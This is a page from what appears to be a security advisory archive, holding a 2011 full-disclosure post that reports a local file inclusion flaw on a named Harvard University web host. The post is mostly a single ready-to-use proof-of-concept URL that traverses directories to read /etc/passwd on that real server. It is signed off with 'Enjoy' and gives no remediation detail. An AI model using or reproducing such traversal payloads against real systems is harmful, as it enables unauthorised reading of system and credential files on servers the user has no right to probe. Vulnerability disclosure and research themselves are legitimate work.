Harvard.edu Local File Inclusion

Harvard.edu Local File Inclusion: Posted Jan 31, 2011; Authored by Luis Santana; www.hcs.harvard.edu appears to suffer from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 85476df54bf5c4817f2d675f6b98efe5361ef52a29abcda9d51dd9b54615835d; Download | Favorite | View

Harvard.edu Local File Inclusion

Hey,

I've tried reporting issues to Harvard University tons of times in the past
but they rarely respond and even more rarely commend researchers for finding
vulnerabilities so I decided that full-disclosure was the way to get Harvard
off of their crimson asses and patch this vulnerability.

PoC link:
http://www.hcs.harvard.edu/~chtnasp/index.php?page=../../../../../../../../../../../../../../../../../../../../../etc/passwd

Enjoy,

Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground

Top Authors In Last 30 Days

Red Hat 268 files
indoushka 153 files
Jay Turla 150 files
Ubuntu 66 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
Gentoo 33 files
H D Moore 31 files
Debian 29 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,116)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,039)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,710)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,802)
UNIX (9,448)
UnixWare (187)
Windows (6,762)
Other

Harvard.edu Local File Inclusion

Harvard.edu Local File Inclusion

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Harvard.edu Local File Inclusion

Share This

Harvard.edu Local File Inclusion

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems